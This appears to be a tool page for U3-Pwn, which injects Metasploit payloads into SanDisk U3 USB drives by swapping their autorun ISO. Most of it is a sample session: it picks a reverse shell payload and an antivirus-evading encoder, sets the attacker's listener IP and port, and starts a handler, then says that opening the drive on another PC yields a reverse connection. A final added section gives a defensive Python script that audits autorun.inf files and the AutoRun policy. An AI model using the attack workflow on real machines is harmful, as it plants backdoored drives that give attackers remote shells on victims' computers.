U3-PWN

Description

U3-Pwn is a tool designed to automate injecting executables into SanDisk smart USB devices that have the default U3 software installed. It does this by removing the original ISO file from the device and creating a new ISO with autorun features.

Example

         ~    .__ °.__   0       o                    ^   .__ °__  `´        
   °____) __ __|  | | °|   ______°____ 0 ____  __ _________|__|/  |_ ___.__.  
   /    \|  | °\  |°|  | °/  ___// __ \_/ ___\|  | °\_  __ \ o\   __<   |  |  
  | o°|  \  |  /  |_|  |__\___ \  ___/\ °\___| o|  /|  | \/  ||  |° \___ O|  
  |___|  /____/|____/____/____ °>\___  >\___  >____/ |__|° |__||__|  / ____|  
  `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/  ``´```´```´´´´`´``0_o\/´´`´´  

   ************************************************************************
        U3-Pwn  Metasploit Payload Injection Tool For SanDisk Devices
   ************************************************************************


   U3-Pwn Main Menu:

   1.  Generate & Replace Iso Image.
   2.  Generate & Replace With Custom Exe.
   3.  Mass U3 Pwnage - Multi device attack.
   4.  Find Out U3 SanDisk Device Information.
   5.  Replace Iso Image With Original U3 Iso.
   6.  About U3-Pwn & Disclaimer.
   7.  Exit U3-Pwn.

   Enter the number: 1


                                                                              

    What payload do you want to generate:

    Name:                                       Description:
    -----                                       ------------

    1) Windows Shell Reverse_TCP                Windows Command Shell, Reverse TCP Stager   
    2) Windows Reverse_TCP Meterpreter          Windows Meterpreter (Reflective Injection), Reverse TCP Stager
    3) Windows Reverse_TCP VNC DLL              VNC Server (Reflective Injection), Reverse TCP Stager
    4) Windows Bind Shell                       Windows Command Shell, Bind TCP Stager
    5) Windows Bind Shell X64                   Windows x64 Command Shell, Bind TCP Inline             
    6) Windows Shell Reverse_TCP X64            Windows x64 Command Shell, Windows x64 Reverse TCP Stager
    7) Windows Meterpreter Reverse_TCP X64      Windows x64 Meterpreter, Windows x64 Reverse TCP Stager      
    8) Windows Meterpreter Reverse HTTPS        Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager  
    9) Windows Meterpreter Reverse DNS          Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   10) ShellCodeExec Alphanum Shellcode         This will drop a meterpreter payload through shellcodeexec (A/V Safe)
      
   Enter number: 1


                                                                              

    What encoder would you like to try and bypass AV with.
    
    Name:                              Description:
    -----                              -----------
     
    1) avoid_utf8_tolower              Avoid UTF8/tolower               
    2) shikata_ga_nai                  Polymorphic XOR Additive Feedback Encoder 
    3) alpha_mixed                     Alpha2 Alphanumeric Mixedcase Encoder
    4) alpha_upper                     Alpha2 Alphanumeric Uppercase Encoder  
    5) call4_dword_xor                 Call+4 Dword XOR Encoder  
    6) countdown                       Single-byte XOR Countdown Encoder  
    7) fnstenv_mov                     Variable-length Fnstenv/mov Dword XOR Encoder  
    8) jmp_call_additive               Jump/Call XOR Additive Feedback Encoder  
    9) nonalpha                        Non-Alpha Encoder  
   10) nonupper                        Non-Upper Encoder  
   11) unicode_mixed                   Alpha2 Alphanumeric Unicode Mixedcase Encoder 
   12) unicode_upper                   Alpha2 Alphanumeric Unicode Uppercase Encoder                          
   13) No Encoding                     Standard Payload Generation  
   14) Multi-Encoder                   Multiple Iteration Encoding 

    
   Enter number: 2

   Enter Ip Address for reverse listener: 192.168.1.12

   Enter the port of the Listener: 5555

   Enter the device to change iso image on (example /dev/sde1): /dev/sdc


                                                                              


  Generating Shellcode Please Wait...
u3_partition_info() failed: Device reported command failed: status 1

   Do you want to start a listener to receive the payload yes or no: yes

   Starting Listener....
[*] Initializing modules...
PAYLOAD => windows/shell/reverse_tcp
LHOST => 192.168.1.12
LPORT => 5555
[*] Started reverse handler on 192.168.1.12:5555 
[*] Starting the payload handler...

After that, use the device on another PC to get a reverse connection just by opening it.
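
For defenders, an added example (not part of U3-Pwn or the original page): a Python check that lists the auto-execution directives in an `autorun.inf` taken from a U3 CD partition, and tests whether a `NoDriveTypeAutoRun` policy value disables AutoRun for CD-ROM type drives, which is how the U3 ISO partition presents itself to Windows. The sample file contents and the function names `audit_autorun` and `cdrom_autorun_disabled` are constructed for illustration.

```python
import re

# Directives in [autorun] that make Windows launch a program from the volume.
EXEC_KEYS = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)
DRIVE_CDROM = 0x20  # NoDriveTypeAutoRun bit for CD-ROM drives (U3 emulates one)

def audit_autorun(text):
    """Return [(key, command)] for each auto-execution directive in autorun.inf text."""
    findings, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):      # skip blanks and comments
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()   # section names are case-insensitive
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if EXEC_KEYS.match(key) and value:
            findings.append((key.lower(), value))
    return findings

def cdrom_autorun_disabled(no_drive_type_autorun):
    """True if the policy bitmask disables AutoRun on CD-ROM type drives."""
    return bool(no_drive_type_autorun & DRIVE_CDROM)

# Constructed sample, not taken from a real device or from the page.
SAMPLE = """\
; constructed example
[AutoRun]
open=launcher.exe -a
icon=launcher.exe,0
shell\\open\\Command = launcher.exe
[Other]
open=ignored.exe
"""

if __name__ == "__main__":
    for key, cmd in audit_autorun(SAMPLE):
        print(f"auto-exec directive: {key} -> {cmd}")
    for mask in (0x91, 0xFF):
        print(f"mask {mask:#04x} disables CD-ROM AutoRun:", cdrom_autorun_disabled(mask))
```

The policy value is read from `NoDriveTypeAutoRun` under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer`; a value of `0xFF` disables AutoRun for every drive type.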
